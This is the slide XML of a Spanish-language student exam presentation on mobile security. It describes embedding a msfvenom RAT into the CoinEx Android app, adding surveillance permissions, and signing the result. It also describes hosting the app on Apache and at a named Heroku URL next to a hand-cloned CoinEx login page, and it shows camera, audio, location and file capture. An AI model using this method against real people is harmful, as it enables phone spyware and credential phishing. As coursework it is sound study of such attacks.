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58" r:id="rId11"/>
    <p:sldId id="257" r:id="rId12"/>
    <p:sldId id="259" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="26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E988-9562-4646-B310-1A3046526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AE5CB-F224-4B19-9618-E64E3361C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BAB6-A9C9-4DC1-93C3-DEDE80FB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B9EA-635F-4DE2-AFDD-1C65B423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A213-ABAC-48D3-8BC2-3E261026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E57B-14F8-44CB-A422-DEE48D3E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EF8B-BD95-4A83-9B85-0F72BB14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97D5-2690-4E04-B21B-67036DD2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FF10-DDD6-4CCE-91B4-545F0BD0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419B-FCF8-4BA7-88D6-129E4338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59E2D-77CD-451F-8B74-98C4AC891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1268-9CD7-4ECA-834F-87BBEFAF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39AF-BECA-44D6-9A7B-EDDFB1C3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E380-8C5D-42C5-BE51-F7708B3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D615-9FD8-407A-8D42-279F5984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B1A5-6BFB-41BA-9F97-E7C1E4E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3740-C358-4F69-B43F-BD3440B7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4E06-021D-474F-8455-F635FFD3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D1AB-1ADF-44C7-AF4F-52DF9EEB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FD9D-27E4-42DD-B07E-CA4F624C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1AF9-B196-44BD-848B-7BFF9092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1BFA-2FAE-407A-9645-6A07778D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AC45-F7E7-4E43-BEB1-4039C41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C478-2326-422D-96AE-D5ED87C6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7DDA-26FF-4EC0-8A11-5D91F431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B087-5B25-4BD1-B08A-0F6EF794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D9E3-574E-4A45-B550-24050599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BCE02-E94B-4AF3-B39E-5B0F2D52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3040-3A8D-4947-A197-008D05BF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4647-7612-413E-8FF1-674E9E3C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4EDBE-453B-416A-8251-99B26415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52CB-A661-4CBA-920D-4757E8E3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82AB-3CAD-4014-854D-08281C47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A701B-007E-42A9-A0D3-F41954B9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12170-A33D-4EF0-8145-407467DD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F7DE-A139-49FA-9E0D-AE0986910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75452-229D-4F2F-BF38-CDD3C65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05876-78FC-45B0-84F7-ABF3B58A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22F81-C252-4CAE-B4D9-8968A22E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A189-D838-4B2A-96C9-36A38747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49FA5-143D-4906-873E-DCCBE0AD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7DD8B-E7B4-4625-9647-208E8E54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C671B-CDC0-4491-9864-5D0CF5D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EEF9D-E68E-4AD3-BA67-F2D03FC8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E4965-A369-4E3E-A605-4036AA7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6AC66-269F-4C49-B966-0822933C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1C81-70CF-4EAE-9191-08362BB3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C227-DE8C-4A8B-8675-A54235B6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5CFC-84ED-4776-9BCD-74775FB4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9884-A084-4325-99AF-AA3D0759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8DC5-F11C-4F40-A8D3-9312115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7746-2F9E-4089-990B-1812304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0C54-0044-4FBF-BAD9-061614E6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86422-EF7E-418D-84A6-94F88D509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BBFF-582A-423A-B2BF-CBE55601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FC0F-2403-4044-B434-925D03B4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C54C-FA70-4E2B-9F8D-8B87C19E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5D08-6B12-49BE-855B-208843E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D51C-F0D9-4302-AE62-041391DE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3EE5A-94A1-4841-8749-E9381683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E58-2790-401E-A33D-2205FFC6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9B9A-60A3-49A8-B13E-6F50577D024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C36A-17CC-452A-A03B-C68F6177A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C79-DF99-4128-8186-833348402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52F3-414F-4D24-801F-469ABD1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ysterious-bastion-81992.herokuapp.com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in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ious-bastion-81992.herokuapp.com/index.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gusecuador/mysample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F00-F84E-468B-9E40-DC75DC28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92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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXAMEN DE SEGURIDAD EN DISPOSITIVOS MÓVILES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1840-B27D-4F55-BB09-FBBBB2A64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b="1" dirty="0"/>
              <a:t>Alumno: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Asqui Yánez Gustavo Misael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08E-F29C-4007-8224-B67446ED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Permisos a agregar a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de manera manual.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C145E-B3FA-4A50-AB26-17C5261F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2024856"/>
            <a:ext cx="6400800" cy="4029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C07E8-6B9B-4427-9C51-E411F98E42C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554897" y="2505670"/>
            <a:ext cx="3798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adicionó los permisos de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>msf.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> hacia la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> en el archivo AndroidManifest.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-EC" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Los permisos agregados en el archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> original nos permite acceder a la cámara, geolocalización, SMS, log de llamadas, listado de contactos, acceder a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>graar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> audio,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4D5-4347-4F72-952C-94A32700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Se realizará inclusión de RAT en app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> versión 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.3.0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6E675-D3C8-4976-B04C-9B0C2D4E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91" y="1811770"/>
            <a:ext cx="40940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81BAD-BDD6-4ABD-AE33-A141F83A9C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5823751" y="1935332"/>
            <a:ext cx="4873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Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>ó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>msfvenon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> que es un RAT en Kali Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>desempaquetó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> original de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf.apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* Tenia </a:t>
            </a:r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apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> es 2.5, sin embargo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provocaba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> error al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intentar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apk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RAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>incluido</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> por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reemplazó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> con la version 2.3.3 de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Apktool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79047-BE3F-4A73-894F-3085199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67" y="460100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3982-4379-4EE7-A3B8-1C48088D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Firmar y Generar certificado a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> incluido el RAT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BAF7B-EEEB-40FC-A41F-96563E05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89" y="1850231"/>
            <a:ext cx="57655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A901C-1744-4F43-88F4-8B62BC2C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61" y="1825625"/>
            <a:ext cx="5105400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2DB67-E6A9-4B82-AB5D-1A33DE5A5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61" y="4382294"/>
            <a:ext cx="5105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B0F6-C229-4F7E-8708-8D0D8EF3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Preparando sitio en localhost de Kali Linux con apache2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29446-5E36-47B8-877F-A9AF8B18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0" y="1885997"/>
            <a:ext cx="629346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E425B-5F61-4577-BB9F-E8308D550DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817310" y="1581887"/>
            <a:ext cx="4536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debe dar permisos de Solo Lectura a cada archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>, gif, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> ubicándolo en la ruta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Verificar que el servicio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> esté corriendo mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0"/>
              <a:t> apache2 status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>, en caso de que esté detenido ejecutar: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0"/>
              <a:t> apache2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r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F4E48-81B2-4B91-9D3E-A8D94165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18" y="3613212"/>
            <a:ext cx="5259789" cy="25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1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1928-BCD5-4C0C-9B5E-FCEE0843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Preparando sitio en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de Kali Linux con apache2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63DB1-7684-4509-BB22-04945CC47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98992"/>
            <a:ext cx="5022356" cy="3363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8CDF0-3C1C-48F1-A29B-FAC57E42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526292" cy="42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CFABB-2362-4922-B9BD-F07D7CA14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662" y="1686735"/>
            <a:ext cx="3228975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1A476-7A15-48B8-A074-97A6347C1B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8820150" y="5048250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Esta pantalla es de descarga presionando en el ícono marcado en amarillo.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84B5-46B2-4D2B-87C1-C414618C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Instalar En celular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0B0D-CDFB-4C69-86DD-02A2CD6D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381742"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>La instalación del APK embebido con RAT se lo hará desde el sitio, en nuestro caso trabajamos con la app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>Coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>Heroku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> en la siguiente URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://mysterious-bastion-81992.herokuapp.com/index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC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5CE62-56C6-45B1-9B16-FC5E8899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55" y="2618913"/>
            <a:ext cx="3848100" cy="400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7F17B-BB16-47B5-B3E0-F51C0318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786" y="2707305"/>
            <a:ext cx="3190875" cy="391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99FBD-3CC3-4043-9371-A9A6A535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18914"/>
            <a:ext cx="3200400" cy="41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C085-99DE-40C3-8534-8A38B217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Captura mediante app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r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> embebida </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rat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81AAF-0015-4C7D-BE00-99919F14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0" y="1935841"/>
            <a:ext cx="5003306" cy="235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AC688-D404-4608-8561-DF8BC587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1" y="4981456"/>
            <a:ext cx="6392108" cy="131445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06740A7-D4A9-4490-A6F1-9CD0FCE3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72261" y="1944568"/>
            <a:ext cx="4853098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4484A3-E07D-4B55-A453-31BF3AF43696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="4705350"/>
            <a:ext cx="28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Consulta de Geolocalización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F2BE4-6A9B-4C55-823B-4022B032F9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7305675" y="1590675"/>
            <a:ext cx="389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Activación de cámara en vivo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>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3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0F0F-9E1D-4988-9B77-F27FD230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Captura mediante app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r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> embebida RAT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9CDBF-8156-4DA5-8D10-AD05ED87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94" y="2057593"/>
            <a:ext cx="3267075" cy="847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B4A9B-1464-49FC-AF3E-D34F4674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2673"/>
            <a:ext cx="4319726" cy="44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85E0D-B72B-432D-A152-B8FC4249D022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949956" y="171798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Registro de audio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BE5D99-5EFF-40B5-B17F-B149A7DE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40" y="1997221"/>
            <a:ext cx="6057900" cy="4625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2D1D7-1040-4AB0-8101-35F73EA6AA19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6088381" y="1690687"/>
            <a:ext cx="398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Acceso a archivos del celular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E4E61-8201-4FA8-9E4B-E8AA1FE9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94" y="4063183"/>
            <a:ext cx="2819400" cy="8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6DA68C-C46F-49CB-855F-475C98227029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017094" y="3719744"/>
            <a:ext cx="28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Lista de cámaras del celular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146C8D-26BA-48F5-AD75-BA90210FA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56" y="5411711"/>
            <a:ext cx="4394401" cy="800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CA0690-1659-4A6C-8158-B6DF0F06DFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949956" y="5065836"/>
            <a:ext cx="36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Información del celular de la práctica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5212-ED6D-4356-9C3C-EECB83FE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D51D-AEAE-4B7E-9797-42C77167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importante tener las versiones correctas para lograr la practica por ejemplo el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> en este caso debe ser la versión </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Considero que para entender el caso es mejor realizarlo de manera manual la inclusión del backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Existen muchos desafíos que investigar para crear o evitar backdoor potentes que no sean detectables por antivirus comunes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Comprendí que el archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>Manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> es donde se incorporan los permisos para la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC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7E2E-91F8-4DDF-B16F-647BF0F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Conclusiones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6C18-B122-4763-BAD4-00D76E26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 esta práctica se puede concluir que al tener un equipo con software de seguridad actualizado, lo cual dificulta la instalación de malware, virus, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>La descarga de sitios no seguros pueden no ser detectados por el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Play Protect y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pudieran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pasar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sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>notarlo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>acaparar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pudieran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perjudicar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privacidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>económicamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>El sitio HEROKU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conectado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> con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publicar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sitios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y la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ventaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>veo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> que no cambia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lo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ngrok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54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F72-0D0D-4AD9-9099-8141D20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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clonado de páginas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9E1B-A0F4-4B18-B559-C3759205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658" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Trabajamos con  la página </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.coinex.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> , la misma que no se clonó con herramientas, sino se realizó obteniendo el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>, imágenes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>, se agregó código </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> para los eventos y validaciones especialmente en la página de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> y descarga de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>. Las páginas son similares a la original y pueden verse en computadoras y dispositivos móviles siendo responsive.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6A92D-60CC-459D-9A2E-31FE8305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07" y="1390650"/>
            <a:ext cx="3802455" cy="51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931E-F9AB-453D-884E-F3142816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Clonado de páginas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E279-AD1B-4CB4-A2E2-14D9398E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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>No se clonó las páginas con herramientas como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>HTTrack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que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tardaba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disco, por lo que se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>optó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> por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página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manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>El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pantalla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lo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sugerido</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> es primero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>luego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para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>descarga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r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RAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intentó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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ngrok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desventaja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cambiaba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reinicio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>haciéndo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inestable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, por lo que se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decidió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 HEROKU, los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
